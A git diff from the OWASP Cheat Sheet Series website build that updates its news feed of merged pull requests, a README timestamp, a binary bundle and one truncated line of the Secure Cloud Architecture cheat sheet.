diff --git a/News.xml b/News.xml index 8bca906ca1..ec067da590 100644 --- a/News.xml +++ b/News.xml @@ -1,2 +1,2 @@ -https://cheatsheetseries.owasp.org/OWASP Cheat Sheet Series update2023-07-07T21:33:33+00:00Core teamdominique.righetto@owasp.orgpython-feedgenhttps://cheatsheetseries.owasp.org/gitbook/images/favicon.icoList of the last updates on the contenthttps://github.com/OWASP/CheatSheetSeries/pull/1017JSON Web Token for Java: Minor grammar fixes2022-12-19T09:49:08+00:002022-12-19T09:49:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1020Update: Microservices Security Cheat Sheet2022-12-20T09:31:51+00:002022-12-20T09:31:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1021Auth Cheat Sheet: Logging chapter - Updated Link to Top10 20212022-12-20T09:14:50+00:002022-12-20T09:14:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1022Minor Update: Query_Parameterization_Cheat_Sheet.md wording and references2022-12-20T09:17:30+00:002022-12-20T09:17:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1023Update deprecated headers Expect-CT and Public-Key-Pins information2023-01-02T14:51:00+00:002023-01-02T14:51:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1025Update: Docker Security Cheat Sheet - Removed deprecated tool: Aqua Security's MicroScanner2022-12-21T14:40:09+00:002022-12-21T14:40:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1026Update GH Actions versions; Pin Ubuntu version2022-12-21T14:37:01+00:002022-12-21T14:37:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1028Update Securing_Cascading_Style_Sheets_Cheat_Sheet.md2023-01-02T22:16:34+00:002023-01-02T22:16:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1030Update Error_Handling_Cheat_Sheet.md2023-01-02T15:01:14+00:002023-01-02T15:01:14+00:00https://github.com/OWASP/CheatSheetSeries/pull/1031Release a Network segmentation Cheat Sheet?2023-01-02T22:08:07+00:002023-01-02T22:08:07+00:00https://github.com/OWASP/CheatSheetSeries/pull/1032Update Logging Cheat Sheet2023-01-02T22:16:46+00:002023-01-02T22:16:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1037Fix minor typos in Contributing2023-01-02T14:56:46+00:002023-01-02T14:56:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1038Add first version of DRF Cheat Sheet2023-01-02T22:05:22+00:002023-01-02T22:05:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1039add PT bug bounty site2023-01-02T22:04:56+00:002023-01-02T22:04:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1040Replaced broken resources2023-01-02T15:01:36+00:002023-01-02T15:01:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1042Add OPA alternatives for policy as code2023-01-02T14:48:10+00:002023-01-02T14:48:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1044Minor fix: Rename Network Segmentation CS to include md extension2023-01-02T23:30:03+00:002023-01-02T23:30:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1045Fix typos2023-01-03T16:17:26+00:002023-01-03T16:17:26+00:00https://github.com/OWASP/CheatSheetSeries/pull/1046Fix2023-01-03T16:17:52+00:002023-01-03T16:17:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1047Add blank lines2023-01-03T16:18:10+00:002023-01-03T16:18:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1048Fix by @kianmeng2023-01-03T16:18:33+00:002023-01-03T16:18:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1049Publish Django REST Framework CS2023-01-04T17:37:36+00:002023-01-04T17:37:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1050Delete draft because released2023-01-10T01:27:44+00:002023-01-10T01:27:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1051Update XSS_Filter_Evasion_Cheat_Sheet.md2023-01-09T16:16:45+00:002023-01-09T16:16:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1052Fix typos in HTTP_Headers_Cheat_Sheet.md2023-01-09T16:15:44+00:002023-01-09T16:15:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1053Added punctuation2023-01-09T17:06:54+00:002023-01-09T17:06:54+00:00https://github.com/OWASP/CheatSheetSeries/pull/1054replaced broken link on password storage cheatsheet2023-01-11T14:20:10+00:002023-01-11T14:20:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1055Update PBKDF2 work factors according to RTX4000 #10432023-01-23T18:52:28+00:002023-01-23T18:52:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1059Add szh to the code team!2023-01-20T16:14:53+00:002023-01-20T16:14:53+00:00https://github.com/OWASP/CheatSheetSeries/pull/1060Team updates2023-01-20T16:24:56+00:002023-01-20T16:24:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1061Update CODEOWNERS2023-01-20T16:30:49+00:002023-01-20T16:30:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1063Add Secrets Management to index2023-01-23T18:50:28+00:002023-01-23T18:50:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1064modified script link with new one previous script link not working2023-01-23T18:06:58+00:00szhhttps://github.com/szh2023-01-23T18:06:58+00:00https://github.com/OWASP/CheatSheetSeries/pull/1065Update iac cheatsheet2023-01-23T18:50:10+00:002023-01-23T18:50:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1066Remove outdated draft CS2023-01-23T18:49:46+00:002023-01-23T18:49:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1067Proofreading of SQL Injection CS2023-01-23T18:49:31+00:002023-01-23T18:49:31+00:00https://github.com/OWASP/CheatSheetSeries/pull/1069fix a typo2023-01-24T14:10:55+00:002023-01-24T14:10:55+00:00https://github.com/OWASP/CheatSheetSeries/pull/1070Added Paralle PDKF2 in #1043 and Login Throttling in #8922023-01-29T14:20:30+00:002023-01-29T14:20:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1072Update ALLOW-FROM browser support in Clickjacking Defense Cheat Sheet2023-01-24T14:25:36+00:002023-01-24T14:25:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1073Update Argon2 and scrypt work factors2023-01-24T19:52:23+00:002023-01-24T19:52:23+00:00https://github.com/OWASP/CheatSheetSeries/pull/1074Update Secrets Management CS2023-01-24T19:53:57+00:002023-01-24T19:53:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1076Minor typo correction2023-01-27T13:58:03+00:002023-01-27T13:58:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1077Update Docker_Security_Cheat_Sheet2023-01-27T14:08:45+00:002023-01-27T14:08:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1079Fix broken link on JSON Web Token Cheat Sheet for Java2023-01-29T14:18:15+00:002023-01-29T14:18:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1080fixed some typos/grammatical errors2023-01-31T12:58:34+00:002023-01-31T12:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1082Add reference for DRF CS2023-02-13T13:56:59+00:002023-02-13T13:56:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1084Add note on Argument Injection2023-03-22T16:57:47+00:002023-03-22T16:57:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1085Small grammatical/typo fixes2023-02-05T00:42:59+00:002023-02-05T00:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1086Public-Key-Pins header has been deprecated2023-02-13T13:35:04+00:002023-02-13T13:35:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1088Added flags to enable secure processing and explicitly disable XInclu…2023-02-17T17:38:22+00:002023-02-17T17:38:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1090Secure design2023-02-22T15:14:09+00:002023-02-22T15:14:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1091DOM Clobbering Prevention Cheat Sheet2023-02-19T17:48:11+00:002023-02-19T17:48:11+00:00https://github.com/OWASP/CheatSheetSeries/pull/1093XSS: remove forward slash (fixes #1089)2023-02-22T14:42:59+00:00szhhttps://github.com/szh2023-02-22T14:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1095Refactored name.2023-02-22T15:40:50+00:002023-02-22T15:40:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1096Fix cs filename2023-02-24T09:52:09+00:002023-02-24T09:52:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1097Improve JAXB example/recommendation with 'disallow-doctype-decl' feat…2023-03-04T03:59:57+00:002023-03-04T03:59:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1099deserialization: typo and some wording2023-03-04T03:58:34+00:002023-03-04T03:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1100deserialization: typo :)2023-03-04T04:17:13+00:002023-03-04T04:17:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1102Add pinning cautions2023-03-14T12:35:06+00:002023-03-14T12:35:06+00:00https://github.com/OWASP/CheatSheetSeries/pull/1103Clarity to JAXP DocumentBuilderFactory section2023-03-22T16:58:57+00:002023-03-22T16:58:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1104[NodeJS Security Cheat Sheet] Fix Express 4.x deprecated res.send2023-03-16T13:13:45+00:002023-03-16T13:13:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1105[NodeJS Security Cheat Sheet] Update various helmet middlewares2023-03-20T12:23:47+00:002023-03-20T12:23:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1106Add Rust Query Parameterization recommendations2023-03-22T16:54:56+00:002023-03-22T16:54:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1107Update XML_External_Entity_Prevention_Cheat_Sheet.md2023-03-24T20:12:49+00:002023-03-24T20:12:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1108Remove link to leapgraph that redirects to gambling website2023-03-29T18:58:34+00:002023-03-29T18:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1113Fix CSRF reference link2023-04-05T15:56:52+00:002023-04-05T15:56:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1115REST Security Cheat Sheet - Removed Deprecated Feature-Policy and added Permissions-Policy 2023-04-22T01:27:20+00:002023-04-22T01:27:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1116Update Password_Storage_Cheat_Sheet.md2023-04-13T20:09:04+00:002023-04-13T20:09:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1117Improved JAXB Example2023-05-31T19:49:20+00:002023-05-31T19:49:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1120Update Input_Validation_Cheat_Sheet.md Fixed a stray any2023-04-17T13:25:15+00:002023-04-17T13:25:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1122document custom request headers as a standalone CSRF protection2023-05-23T08:18:27+00:002023-05-23T08:18:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1125Commit for issue #11242023-04-28T10:31:25+00:002023-04-28T10:31:25+00:00https://github.com/OWASP/CheatSheetSeries/pull/1126Clarify that ProcessStartInfo.ArgumentList is not safe with untrusted data2023-05-02T13:28:21+00:002023-05-02T13:28:21+00:00https://github.com/OWASP/CheatSheetSeries/pull/1130remove SeaSponge from Threat Modeling Cheat Sheet2023-05-10T13:35:09+00:002023-05-10T13:35:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1131HTTP_Headers_Cheat_Sheet: Add missing comma in Permissions-Policy2023-05-10T13:35:27+00:002023-05-10T13:35:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1134Added pytm to tools and CTM to threat libraries list2023-05-18T16:34:32+00:002023-05-18T16:34:32+00:00https://github.com/OWASP/CheatSheetSeries/pull/1136Fix typo in CSRF Prevention cheat sheet2023-05-23T18:07:43+00:002023-05-23T18:07:43+00:00https://github.com/OWASP/CheatSheetSeries/pull/1137I checked to see if there are any other broken links on the page but this onre was quiet annoying when reading the post.2023-05-30T12:28:13+00:002023-05-30T12:28:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1138Adding some sample encryption code to the DotNet cheatsheet2023-06-13T12:14:59+00:002023-06-13T12:14:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1139Reintroduce an overview of Double Submit Cookie with HMAC2023-05-31T19:01:15+00:002023-05-31T19:01:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1142Lint fix2023-05-31T19:17:59+00:002023-05-31T19:17:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1144Typo in pseudocode2023-06-08T13:28:08+00:002023-06-08T13:28:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1146Creating dedicated Java Security Cheat Sheet2023-06-30T17:02:01+00:002023-06-30T17:02:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1150Fix issue with nonce reuse2023-06-22T12:58:29+00:002023-06-22T12:58:29+00:00https://github.com/OWASP/CheatSheetSeries/pull/1151Fix typo on CSRF cheat sheet2023-06-22T19:10:00+00:002023-06-22T19:10:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1152Secure Cloud Architecture cheat sheet2023-07-07T21:31:57+00:002023-07-07T21:31:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1154Removed Encrypted CSRF Cookie2023-06-25T17:42:13+00:002023-06-25T17:42:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1156Update markdown lint to allow collapsible sections2023-06-25T17:41:46+00:002023-06-25T17:41:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1157Initial start for prototype pollution prevention cheatsheet2023-06-30T17:02:33+00:002023-06-30T17:02:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1158Fix linting config2023-06-26T18:01:59+00:002023-06-26T18:01:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1159Add some pitfalls to the dotnet crypto code2023-06-30T17:02:51+00:002023-06-30T17:02:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1160Minor modifications to Java cheatsheet2023-07-05T13:22:57+00:002023-07-05T13:22:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1161Fix points which @szh raised in #11572023-07-05T12:04:15+00:002023-07-05T12:04:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1162Fix collapsible labels2023-07-05T13:27:48+00:002023-07-05T13:27:48+00:00https://github.com/OWASP/CheatSheetSeries/pull/1163Update Ruby_on_Rails_Cheat_Sheet.md2023-07-06T13:16:08+00:002023-07-06T13:16:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1164Replaced dead link in the Key Management Cheat Sheet2023-07-06T13:49:51+00:002023-07-06T13:49:51+00:00 \ No newline at end of file +https://cheatsheetseries.owasp.org/OWASP Cheat Sheet Series update2023-07-10T13:32:31+00:00Core teamdominique.righetto@owasp.orgpython-feedgenhttps://cheatsheetseries.owasp.org/gitbook/images/favicon.icoList of the last updates on the contenthttps://github.com/OWASP/CheatSheetSeries/pull/1020Update: Microservices Security Cheat Sheet2022-12-20T09:31:51+00:002022-12-20T09:31:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1021Auth Cheat Sheet: Logging chapter - Updated Link to Top10 20212022-12-20T09:14:50+00:002022-12-20T09:14:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1022Minor Update: Query_Parameterization_Cheat_Sheet.md wording and references2022-12-20T09:17:30+00:002022-12-20T09:17:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1023Update deprecated headers Expect-CT and Public-Key-Pins information2023-01-02T14:51:00+00:002023-01-02T14:51:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1025Update: Docker Security Cheat Sheet - Removed deprecated tool: Aqua Security's MicroScanner2022-12-21T14:40:09+00:002022-12-21T14:40:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1026Update GH Actions versions; Pin Ubuntu version2022-12-21T14:37:01+00:002022-12-21T14:37:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1028Update Securing_Cascading_Style_Sheets_Cheat_Sheet.md2023-01-02T22:16:34+00:002023-01-02T22:16:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1030Update Error_Handling_Cheat_Sheet.md2023-01-02T15:01:14+00:002023-01-02T15:01:14+00:00https://github.com/OWASP/CheatSheetSeries/pull/1031Release a Network segmentation Cheat Sheet?2023-01-02T22:08:07+00:002023-01-02T22:08:07+00:00https://github.com/OWASP/CheatSheetSeries/pull/1032Update Logging Cheat Sheet2023-01-02T22:16:46+00:002023-01-02T22:16:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1037Fix minor typos in Contributing2023-01-02T14:56:46+00:002023-01-02T14:56:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1038Add first version of DRF Cheat Sheet2023-01-02T22:05:22+00:002023-01-02T22:05:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1039add PT bug bounty site2023-01-02T22:04:56+00:002023-01-02T22:04:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1040Replaced broken resources2023-01-02T15:01:36+00:002023-01-02T15:01:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1042Add OPA alternatives for policy as code2023-01-02T14:48:10+00:002023-01-02T14:48:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1044Minor fix: Rename Network Segmentation CS to include md extension2023-01-02T23:30:03+00:002023-01-02T23:30:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1045Fix typos2023-01-03T16:17:26+00:002023-01-03T16:17:26+00:00https://github.com/OWASP/CheatSheetSeries/pull/1046Fix2023-01-03T16:17:52+00:002023-01-03T16:17:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1047Add blank lines2023-01-03T16:18:10+00:002023-01-03T16:18:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1048Fix by @kianmeng2023-01-03T16:18:33+00:002023-01-03T16:18:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1049Publish Django REST Framework CS2023-01-04T17:37:36+00:002023-01-04T17:37:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1050Delete draft because released2023-01-10T01:27:44+00:002023-01-10T01:27:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1051Update XSS_Filter_Evasion_Cheat_Sheet.md2023-01-09T16:16:45+00:002023-01-09T16:16:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1052Fix typos in HTTP_Headers_Cheat_Sheet.md2023-01-09T16:15:44+00:002023-01-09T16:15:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1053Added punctuation2023-01-09T17:06:54+00:002023-01-09T17:06:54+00:00https://github.com/OWASP/CheatSheetSeries/pull/1054replaced broken link on password storage cheatsheet2023-01-11T14:20:10+00:002023-01-11T14:20:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1055Update PBKDF2 work factors according to RTX4000 #10432023-01-23T18:52:28+00:002023-01-23T18:52:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1059Add szh to the code team!2023-01-20T16:14:53+00:002023-01-20T16:14:53+00:00https://github.com/OWASP/CheatSheetSeries/pull/1060Team updates2023-01-20T16:24:56+00:002023-01-20T16:24:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1061Update CODEOWNERS2023-01-20T16:30:49+00:002023-01-20T16:30:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1063Add Secrets Management to index2023-01-23T18:50:28+00:002023-01-23T18:50:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1064modified script link with new one previous script link not working2023-01-23T18:06:58+00:00szhhttps://github.com/szh2023-01-23T18:06:58+00:00https://github.com/OWASP/CheatSheetSeries/pull/1065Update iac cheatsheet2023-01-23T18:50:10+00:002023-01-23T18:50:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1066Remove outdated draft CS2023-01-23T18:49:46+00:002023-01-23T18:49:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1067Proofreading of SQL Injection CS2023-01-23T18:49:31+00:002023-01-23T18:49:31+00:00https://github.com/OWASP/CheatSheetSeries/pull/1069fix a typo2023-01-24T14:10:55+00:002023-01-24T14:10:55+00:00https://github.com/OWASP/CheatSheetSeries/pull/1070Added Paralle PDKF2 in #1043 and Login Throttling in #8922023-01-29T14:20:30+00:002023-01-29T14:20:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1072Update ALLOW-FROM browser support in Clickjacking Defense Cheat Sheet2023-01-24T14:25:36+00:002023-01-24T14:25:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1073Update Argon2 and scrypt work factors2023-01-24T19:52:23+00:002023-01-24T19:52:23+00:00https://github.com/OWASP/CheatSheetSeries/pull/1074Update Secrets Management CS2023-01-24T19:53:57+00:002023-01-24T19:53:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1076Minor typo correction2023-01-27T13:58:03+00:002023-01-27T13:58:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1077Update Docker_Security_Cheat_Sheet2023-01-27T14:08:45+00:002023-01-27T14:08:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1079Fix broken link on JSON Web Token Cheat Sheet for Java2023-01-29T14:18:15+00:002023-01-29T14:18:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1080fixed some typos/grammatical errors2023-01-31T12:58:34+00:002023-01-31T12:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1082Add reference for DRF CS2023-02-13T13:56:59+00:002023-02-13T13:56:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1084Add note on Argument Injection2023-03-22T16:57:47+00:002023-03-22T16:57:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1085Small grammatical/typo fixes2023-02-05T00:42:59+00:002023-02-05T00:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1086Public-Key-Pins header has been deprecated2023-02-13T13:35:04+00:002023-02-13T13:35:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1088Added flags to enable secure processing and explicitly disable XInclu…2023-02-17T17:38:22+00:002023-02-17T17:38:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1090Secure design2023-02-22T15:14:09+00:002023-02-22T15:14:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1091DOM Clobbering Prevention Cheat Sheet2023-02-19T17:48:11+00:002023-02-19T17:48:11+00:00https://github.com/OWASP/CheatSheetSeries/pull/1093XSS: remove forward slash (fixes #1089)2023-02-22T14:42:59+00:00szhhttps://github.com/szh2023-02-22T14:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1095Refactored name.2023-02-22T15:40:50+00:002023-02-22T15:40:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1096Fix cs filename2023-02-24T09:52:09+00:002023-02-24T09:52:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1097Improve JAXB example/recommendation with 'disallow-doctype-decl' feat…2023-03-04T03:59:57+00:002023-03-04T03:59:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1099deserialization: typo and some wording2023-03-04T03:58:34+00:002023-03-04T03:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1100deserialization: typo :)2023-03-04T04:17:13+00:002023-03-04T04:17:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1102Add pinning cautions2023-03-14T12:35:06+00:002023-03-14T12:35:06+00:00https://github.com/OWASP/CheatSheetSeries/pull/1103Clarity to JAXP DocumentBuilderFactory section2023-03-22T16:58:57+00:002023-03-22T16:58:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1104[NodeJS Security Cheat Sheet] Fix Express 4.x deprecated res.send2023-03-16T13:13:45+00:002023-03-16T13:13:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1105[NodeJS Security Cheat Sheet] Update various helmet middlewares2023-03-20T12:23:47+00:002023-03-20T12:23:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1106Add Rust Query Parameterization recommendations2023-03-22T16:54:56+00:002023-03-22T16:54:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1107Update XML_External_Entity_Prevention_Cheat_Sheet.md2023-03-24T20:12:49+00:002023-03-24T20:12:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1108Remove link to leapgraph that redirects to gambling website2023-03-29T18:58:34+00:002023-03-29T18:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1113Fix CSRF reference link2023-04-05T15:56:52+00:002023-04-05T15:56:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1115REST Security Cheat Sheet - Removed Deprecated Feature-Policy and added Permissions-Policy 2023-04-22T01:27:20+00:002023-04-22T01:27:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1116Update Password_Storage_Cheat_Sheet.md2023-04-13T20:09:04+00:002023-04-13T20:09:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1117Improved JAXB Example2023-05-31T19:49:20+00:002023-05-31T19:49:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1120Update Input_Validation_Cheat_Sheet.md Fixed a stray any2023-04-17T13:25:15+00:002023-04-17T13:25:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1122document custom request headers as a standalone CSRF protection2023-05-23T08:18:27+00:002023-05-23T08:18:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1125Commit for issue #11242023-04-28T10:31:25+00:002023-04-28T10:31:25+00:00https://github.com/OWASP/CheatSheetSeries/pull/1126Clarify that ProcessStartInfo.ArgumentList is not safe with untrusted data2023-05-02T13:28:21+00:002023-05-02T13:28:21+00:00https://github.com/OWASP/CheatSheetSeries/pull/1130remove SeaSponge from Threat Modeling Cheat Sheet2023-05-10T13:35:09+00:002023-05-10T13:35:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1131HTTP_Headers_Cheat_Sheet: Add missing comma in Permissions-Policy2023-05-10T13:35:27+00:002023-05-10T13:35:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1134Added pytm to tools and CTM to threat libraries list2023-05-18T16:34:32+00:002023-05-18T16:34:32+00:00https://github.com/OWASP/CheatSheetSeries/pull/1136Fix typo in CSRF Prevention cheat sheet2023-05-23T18:07:43+00:002023-05-23T18:07:43+00:00https://github.com/OWASP/CheatSheetSeries/pull/1137I checked to see if there are any other broken links on the page but this onre was quiet annoying when reading the post.2023-05-30T12:28:13+00:002023-05-30T12:28:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1138Adding some sample encryption code to the DotNet cheatsheet2023-06-13T12:14:59+00:002023-06-13T12:14:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1139Reintroduce an overview of Double Submit Cookie with HMAC2023-05-31T19:01:15+00:002023-05-31T19:01:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1142Lint fix2023-05-31T19:17:59+00:002023-05-31T19:17:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1144Typo in pseudocode2023-06-08T13:28:08+00:002023-06-08T13:28:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1146Creating dedicated Java Security Cheat Sheet2023-06-30T17:02:01+00:002023-06-30T17:02:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1150Fix issue with nonce reuse2023-06-22T12:58:29+00:002023-06-22T12:58:29+00:00https://github.com/OWASP/CheatSheetSeries/pull/1151Fix typo on CSRF cheat sheet2023-06-22T19:10:00+00:002023-06-22T19:10:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1152Secure Cloud Architecture cheat sheet2023-07-07T21:31:57+00:002023-07-07T21:31:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1154Removed Encrypted CSRF Cookie2023-06-25T17:42:13+00:002023-06-25T17:42:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1156Update markdown lint to allow collapsible sections2023-06-25T17:41:46+00:002023-06-25T17:41:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1157Initial start for prototype pollution prevention cheatsheet2023-06-30T17:02:33+00:002023-06-30T17:02:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1158Fix linting config2023-06-26T18:01:59+00:002023-06-26T18:01:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1159Add some pitfalls to the dotnet crypto code2023-06-30T17:02:51+00:002023-06-30T17:02:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1160Minor modifications to Java cheatsheet2023-07-05T13:22:57+00:002023-07-05T13:22:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1161Fix points which @szh raised in #11572023-07-05T12:04:15+00:002023-07-05T12:04:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1162Fix collapsible labels2023-07-05T13:27:48+00:002023-07-05T13:27:48+00:00https://github.com/OWASP/CheatSheetSeries/pull/1163Update Ruby_on_Rails_Cheat_Sheet.md2023-07-06T13:16:08+00:002023-07-06T13:16:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1164Replaced dead link in the Key Management Cheat Sheet2023-07-06T13:49:51+00:002023-07-06T13:49:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1166Bug - Incorrect markdown link in Cloud Arch Sheet 2023-07-10T13:30:45+00:002023-07-10T13:30:45+00:00 \ No newline at end of file diff --git a/README.md b/README.md index 8aa6ea3bf1..8ce35c835a 100644 --- a/README.md +++ b/README.md @@ -1 +1 @@ -Website last update: 2023-07-07 at 21:35:24. +Website last update: 2023-07-10 at 13:33:57. diff --git a/bundle.zip b/bundle.zip index ec785413c6..2fb838eced 100644 Binary files a/bundle.zip and b/bundle.zip differ diff --git a/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html b/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html index 9c7b8ae1aa..4e5caee01e 100644 --- a/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html +++ b/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html @@ -2243,7 +2243,7 @@

Simple Architecture ExampleTrust Boundaries

